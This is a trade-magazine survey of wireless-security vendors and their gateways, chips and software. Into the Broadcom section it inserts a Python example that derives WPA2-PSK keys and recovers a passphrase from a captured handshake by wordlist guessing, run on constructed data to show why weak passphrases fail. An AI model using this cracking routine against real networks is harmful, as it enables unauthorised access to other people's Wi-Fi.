Wireless Systems Design

Top Wireless-Security Vendors Vary In Their Approaches

The growing demand for integrated security on a multitude of wireless-device and network products is a marketing boon for gateway, hardware-chip, and software developers.

Who are the major players in the burgeoning wireless-security market? The answer to this question depends on how you define the word "major." Some might suggest that it means the companies with the highest revenues. Others might point to companies with the most market share. Perhaps a better approach, though, would be to look at a cross section of wireless-security companies. Such an examination might bring to light appliance vendors like Vernier, AirDefense, Cisco, Bluesocket, and even Nokia. It also would include hardware switch and chip suppliers, such as Broadcom, Proxim, and Via, as well as software-intensive solutions like the one from Certicom.

This report takes that cross-sectional approach. While it doesn't cover all of the vendors in the security market, this article does present a representative sampling of companies and their wireless-security offerings. Because this is an overview, the companies aren't listed in any particular order. To begin, let's look at some of the wireless-network-appliance companies that make standalone gateway systems and related devices.

Founded in early 2001, Vernier Networks (www.verniernetworks.com) has developed the Adaptive Security Platform (ASP) approach to security. The aim of the ASP is to balance the need for open network access against the risk of intrusions. Its wireless-local-area-network (WLAN) security gateways are also sold, under OEM arrangements, as part of some Hewlett-Packard networking systems.

The ASP solution consists of the Vernier 6500 series network appliances and the Vernier VNX software. The network appliances—single-purpose devices from which all nonessential functions have been stripped away—include the System 6500 and the IS 6500 Integrated System. For large enterprises, the System 6500 provides a tiered solution featuring a Control Server and one or more Access Managers. The Control Server allows network administrators to create and manage security policies from a central location. They also can monitor network usage and manage all Access Managers.

The Access Manager is a rack-mountable device. It performs access control, packet filtering, policy enforcement, and intrusion management for both subnets and wireless coverage zones downstream. Each Access Manager is deployed in-line in the data path. Its purpose is to function as a security gateway between end users and the network core.

The IS 6500 Integrated System provides a single-box solution for smaller deployments. All 6500-series appliances are supported by the company's VNX software, which includes the Vernier Rights Manager, the Vernier Domain Administrator, and policy-enforcement engines. No special software is required to run on the client devices.

For more information on the Vernier ASP system, please see the June 2003 issue of Wireless Systems Design (www.wsdmag.com/Articles/Index.cfm?ArticleID=6469).

As the name implies, AirDefense, Inc. (www.airdefense.net) provides security systems that monitor and protect WLAN airwaves. The company claims to have pioneered the concept of 24/7 monitoring using a distributed architecture of remote sensor probes and a server appliance. Its flagship product, AirDefense 4.0, has probes that communicate in real time with the server appliance. In turn, the server appliance analyzes the data to provide centralized, predictive views of rogue detection, policy enforcement, intrusion protection, and health monitoring of the wireless LAN (FIG. 1).

The first tier of the company's layered approach to security consists of remote RF sensors. This type of monitoring provides a continuous view of the network functioning. It can determine whether or not the security policies are being followed. These probes are essential to understanding what devices are in the air space, what devices are connecting with which users, and how the devices are interacting. By monitoring the air space, network administrators can identify trends for unusual traffic patterns, potential network abuse (such as large file transfers), and load balancing.

Recently, AirDefense announced one of the first tools to monitor Bluetooth security. This product, which is aptly called BlueWatch, identifies all Bluetooth-enabled devices and their communications within a given air space. It allows information-technology (IT) administrators to pinpoint devices that are either misconfigured or lacking authentication or encryption. BlueWatch identifies different types of Bluetooth-enabled devices including laptops, PDAs, keyboards, and cell phones. It provides key attributes, such as device class, manufacturer, and signal strength. More importantly, it can identify the services that are available on each device. Examples include network access, fax, and the audio gateway.

It's no secret that Cisco (www.cisco.com) is one of the largest suppliers of access points (APs) and bridges for wireless networks. The company's Aironet family of APs comes complete with a wireless-security suite based on the IEEE 802.1X standard. The key features of this security suite are mutual authentication and dynamic-encryption key management. Among its other features are data encryption using both Wired Equivalent Privacy (WEP) and the Temporal Key Integrity Protocol (TKIP). The Advanced Encryption Standard (AES) is being added this year. AES encryption is a critical feature of the IEEE 802.11i security specification. The security suite also boasts full support for the Wi-Fi Alliance security standard, Wi-Fi Protected Access (WPA).

The Aironet family of access points and bridges—including the 1100, 1200, 1300, and 1400 series—offers support for all 802.11a/b/g throughputs and protocols. Other Cisco security products include virtual-private-network (VPN) hardware and features for the Internetwork Operating System (IOS) and Security Device Manager software. These products provide firewall functions and help identify the source of denial-of-service (DoS) attacks.

A wireless network's greatest risk is that a user doesn't have to be physically connected to the LAN in order to gain network access. To address this problem, Bluesocket, Inc. (www.bluesocket.com) introduced its first wireless gateway in 2001. Today, the company has a family of wireless gateways including the WG-1100, WG-2100, and WG-5000.

All of its gateways offer VPN-like encryption (PPTP and IPsec) and network-management features, such as role-based access control, bandwidth throttling, and authorization/authentication. Secure Mobility lets users roam securely across subnets without re-authenticating. The gateways support all flavors of 802.11 while extending and integrating legacy networking equipment (e.g., Cisco) with wireless infrastructure.

Recently, Bluesocket expanded into the wireless-monitoring market with the BlueSecure intrusion-detection system. This air-security product includes a server and dedicated sensors. They can monitor traffic on 802.11a, b, and g networks. The product allows WLAN administrators to view all user activities including neighboring WLANs, rogue or unauthorized radio APs, and outside threats posed by "wardriving."

The sensor system, which is called BlueSecure RF Sensor, comprises a general-purpose, built-in RF listening device. This device supports 802.11b/a/g as an overlay to enterprises with or without an existing WLAN. Because it works with any vendor's APs or Wi-Fi client devices, it doesn't require any changes to existing wireless or wired infrastructure.

Using both WLAN and cellular networks, more and more users are accessing the Internet and corporate networks from wireless devices. While both cellular networks and WLANs allow mobility for remote users, they lack a coherent way to restrict unauthorized user access. To combat this problem, Nokia (www.nokia.com) has offered the Secure Access System security mechanism. Because it resides at the network application layer, this system takes advantage of all of the security measures in the lower network layers. Any device with a web browser—from cellular handsets to wireless PDAs and laptops—can therefore utilize all web-enabled enterprise applications.

The Nokia Secure Access System (NSAS) is a hardware appliance. It improves wireless security by establishing an encrypted tunnel between the remote mobile/wireless device and the corporate network. Even if the wireless network is somehow compromised, the company claims that the confidentiality of the data between the remote user and the corporate network will be maintained. By ensuring a high level of security in the remote device itself, this system also improves wireless security. Remote users also are assured that a lost or stolen device won't translate into lost information.

The NSAS is an SSL VPN appliance that connects to an Internet firewall. It is designed to provide secure access to corporate intranets and extranets. It is built on Nokia's IP Security Platform and IPSO secure operating system.

Several big semiconductor-chip vendors play a significant role in wireless-network security. One such company is Broadcom (www.broadcom.com). Currently, it holds the chair position on the Wi-Fi Alliance's Security Council. That committee has driven the adoption of Wi-Fi Protected Access (WPA)—the first standards-based, interoperable security technology for Wi-Fi networks.

Broadcom has been incorporating AES technology into its hardware since the fall of 2002, when the company introduced its original 802.11 product line. AES is required to run the now-ratified 802.11i standard. Without AES in hardware, the computationally intensive cipher could slow Wi-Fi products to unacceptable levels. The 802.11i standard will be certified interoperable by the Wi-Fi Alliance through its Wi-Fi Protected Access 2 (WPA2) program, which is scheduled to launch in September.

Of course, Broadcom also offers a multitude of chip products for the wireless market. For one example, take a look at the October 2003 issue of Wireless Systems Design (www.wsdmag.com/Articles/Index.cfm?ArticleID=6805). In addition to those hardware offerings, the company recently introduced a software security package called SecureEZSetup (SES).

This program is designed for the non-technical user. It allows a Wi-Fi network to be securely set up by running a very simple, two-step set-up wizard on a PC. The user answers easy, non-technical questions, such as his or her birth date and pet's name. SES then configures the wireless router and PC by setting up the Service Set Identifier (SSID) and WPA—a standards-based security feature that's built into all Wi-Fi-certified products. Given the increasing number of users that telecommute or regularly work from home or abroad, SES is very valuable to IT managers and the enterprise environment as a whole. It helps to ensure that all home or satellite office networks are properly configured and security-enabled.
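What "setting up WPA" on a home network commits to cryptographically, as an added example; this is not the article's code or Broadcom's SES, whose internals the article does not describe. In WPA/WPA2-PSK the pairwise master key is PBKDF2-HMAC-SHA1 over the passphrase and the SSID, and the MIC on message 2 of the four-way handshake lets anyone who captured that handshake test passphrase guesses offline. The code assumes a WPA2/CCMP network (EAPOL-Key descriptor version 2, HMAC-SHA1 MIC); the SSID, MAC addresses, nonces, passphrase, wordlist and EAPOL frame are all constructed for the demonstration.

```python
"""WPA/WPA2-PSK key derivation and the offline passphrase check it permits.

Added example; not Broadcom SES code. Assumes a WPA2/CCMP network
(EAPOL-Key descriptor version 2, HMAC-SHA1 MIC). Every value below
(SSID, MACs, nonces, passphrase, wordlist, frame) is constructed.
"""
import hashlib
import hmac

MIC_OFFSET = 81          # MIC field position in an EAPOL-Key frame
MIC_LEN = 16


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    # PTK = PRF-384(PMK, "Pairwise key expansion", min/max of the MACs and nonces)
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, frame_zeroed_mic: bytes) -> bytes:
    # Descriptor version 2: HMAC-SHA1 over the frame with the MIC field zeroed, truncated
    return hmac.new(kck, frame_zeroed_mic, hashlib.sha1).digest()[:MIC_LEN]


# --- constructed network and handshake material ---------------------------
SSID = "HomeNet"
AP_MAC = bytes.fromhex("001122334455")    # from the 802.11 header of the capture
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))                  # sent in the clear in message 1
SNONCE = bytes(range(32, 64))              # sent in the clear in message 2

# Constructed EAPOL-Key message 2 (field layout from 802.11i):
#   ver|type|len|desc|key info 0x010a (ver 2, pairwise, MIC)|key len|replay
#   |SNonce|IV|RSC|ID|MIC|data len|RSN IE (CCMP/CCMP/PSK)
M2_HEAD = (b"\x01\x03\x00\x75\x02\x01\x0a\x00\x10" + (1).to_bytes(8, "big")
           + SNONCE + bytes(16) + bytes(8) + bytes(8))
M2_TAIL = b"\x00\x16" + bytes.fromhex("30140100000fac040100000fac040100000fac020000")
assert len(M2_HEAD) == MIC_OFFSET


def build_message2(passphrase: str) -> bytes:
    """Station side: compute the MIC the AP will check."""
    ptk = derive_ptk(derive_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    mic = eapol_mic(ptk[:16], M2_HEAD + bytes(MIC_LEN) + M2_TAIL)   # KCK = PTK[0:16]
    return M2_HEAD + mic + M2_TAIL


def recover_passphrase(captured_m2: bytes, wordlist):
    """Attacker side: everything except the passphrase is in the capture."""
    snonce = captured_m2[17:49]
    observed = captured_m2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    zeroed = captured_m2[:MIC_OFFSET] + bytes(MIC_LEN) + captured_m2[MIC_OFFSET + MIC_LEN:]
    for guess in wordlist:
        ptk = derive_ptk(derive_pmk(guess, SSID), AP_MAC, STA_MAC, ANONCE, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], zeroed), observed):
            return guess
    return None


if __name__ == "__main__":
    frame = build_message2("fluffy1990")          # pet's name + birth year
    print(recover_passphrase(frame, ["password", "fluffy", "fluffy1990"]))
```

Because every input to the MIC except the passphrase travels in the clear, passphrase entropy is the only defence at this layer: a pet's name plus a birth year is a few dozen bits at most, and the 4096-iteration PBKDF2 only slows a guessing attack by a constant factor.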

Another company that's active in the wireless-security chip market is Atmel (www.atmel.com). In the WLAN arena, this company offers a suite of 802.11b media-access-controller (MAC) and MAC-plus-baseband-controller parts. Both product lines are eligible for Wi-Fi Protected Access certification. These low-power devices include hardware acceleration for WEP-64 and WEP-128 as well as hardware implementations for TKIP and AES.

In addition to secure processors, this company provides a line of high-security memory chips with data encryption. Called CryptoMemory, these chips are available from 1 to 256 Kb. They help ensure data security through a variety of techniques including an authentication protocol, data encryption, and tamper-protection circuits.

Among Atmel's other notable offerings is a family of secure RF devices. Dubbed CryptoRF Wireless ICs, they enable data encryption for applications like contactless smart cards and the industrial radio-frequency-identification (RFID) market. In addition, Atmel developed a fingerprint sensor in the area of biometrics. The FingerChip enables logon security for mobile devices (FIG. 2).

When it comes to wireless-networking equipment for Wi-Fi and broadband networks, Proxim (www.proxim.com) is a well-known developer. Perhaps its most recognized offerings in the security arena are the AP-2000 and the AP-4000. A key feature of both APs is their support for the IEEE 802.1X standard. Wi-Fi Protected Access user authentication is implemented using 802.1X and the Extensible Authentication Protocol (EAP).

The AP-2000 family supports 802.11b wireless networks with optional tri-mode (simultaneous 802.11a/b/g) operation and dual-radio support of multiple users. For high-performance needs, the AP-4000 product line comes preconfigured with tri-mode for the automatic support of all client types. It also supports 40-Mbps throughput with 802.11g and 802.11a simultaneous operation. On the security side, the AP-4000 has built-in rogue detection for 802.11b/g and 802.11a access points. In addition to existing standards-based security, it includes support for multiple, simultaneous security settings. Security settings for multiple groups allow a variety of users—whether they're employees, guests, or contractors—to securely share the same infrastructure.

All of Proxim's APs support security standards like Wi-Fi Protected Access for 802.1X mutual authentication. Other features include dynamic per-user and per-session rotating keys, rogue AP detection, and notification. Several secure management interfaces also are supported, such as SNMPv3 and SSL. Most of the company's APs are software upgradeable to AES and 802.11i.

Another way to provide security to wireless devices is through the hardware. VIA Technologies (www.viatech.com), a fabless chip supplier located in Taipei, Taiwan, has integrated AES acceleration into its CPU. This approach resulted in a low-power, small-footprint x86 platform that's well suited for devices like wireless APs. The company's PadLock Advanced Cryptography Engine (ACE) is embedded in the C5P Nehemiah processor-core architecture, so VIA supports hardware-based AES encryption (FIG. 3)—a key element of the IEEE 802.11i security standard. The VIA core is readily scalable to adapt to changing wireless-security requirements. According to the company, specialized RISC-based processors cannot match the economies of scale that allow x86 processors to dominate cost/performance comparisons.

The VIA Eden family of embedded x86 processors offers low power consumption (less than 2.5 W max at 533 MHz) and a small package size (15 x 15 mm). Such features allow the processors to meet the design constraints of AP system developers. Currently, the processors' performance scales to over 1.4 GHz. That number will advance to 2 GHz with the next-generation core architecture.

Perhaps the primary benefit of these processors, however, is the capability to use the well-proven x86 software and hardware infrastructure to minimize development time and reduce system costs. The company's x86 processors have been adopted for a wide range of embedded applications by several wireless-device vendors. An example is the LocustWorld Mesh AP Router. It relies on a VIA EPIA VE5000 Mini-ITX mainboard to create a self-contained wireless-communications device for secure mesh-network topologies.

One of the biggest advantages of today's mobile device—namely, mobility—is also its biggest security weakness. Consumers demand that wireless mobile devices be small and lightweight while seldom needing to be recharged. These needs put severe constraints on the devices' security capabilities. The problem is that mobile devices have only limited processor power, memory, and communication bandwidth to spend on security functions.

Certicom's (www.certicom.com) Elliptic Curve Cryptography (ECC) offers a promising solution to these challenges. ECC enables efficient authentication and key exchange. For a given security level it uses much smaller keys, and therefore less memory, processing power, and bandwidth, than other public-key schemes such as RSA (a 256-bit ECC key is generally rated as equivalent in strength to a 3072-bit RSA key). ECC has been adopted in standards from ANSI, NIST (FIPS), IEEE, IETF, ISO, and others.

The company's Security Builder Developer Toolkits allow developers to add security functionality to wireless devices and applications. Security Builder utilizes a common application programming interface (API) across multiple platforms and chip sets. It achieves a small security footprint while integrating current and legacy cryptographic algorithms and security protocols.

Recently, Certicom announced a new product that targets wireless operators. Called CodeSign, it is a standards-based code-signing application for secure code distribution. Because it is accessed through a web browser, CodeSign enables the remote distribution of firmware updates and applications over the air or via a wired network.

For more information on the Certicom security system, refer to the April 2004 issue of Wireless Systems Design (www.wsdmag.com/Articles/Index.cfm?ArticleID=7918).

This article has highlighted some of the major players in today's wireless-security industry. It also examined the different types of security implementations currently available for wireless devices. This rich diversity of solutions—ranging from appliance-product devices to hardware and software-intensive applications—should not be surprising. On the contrary, it helps to underscore the layered nature of today's most successful security frameworks.
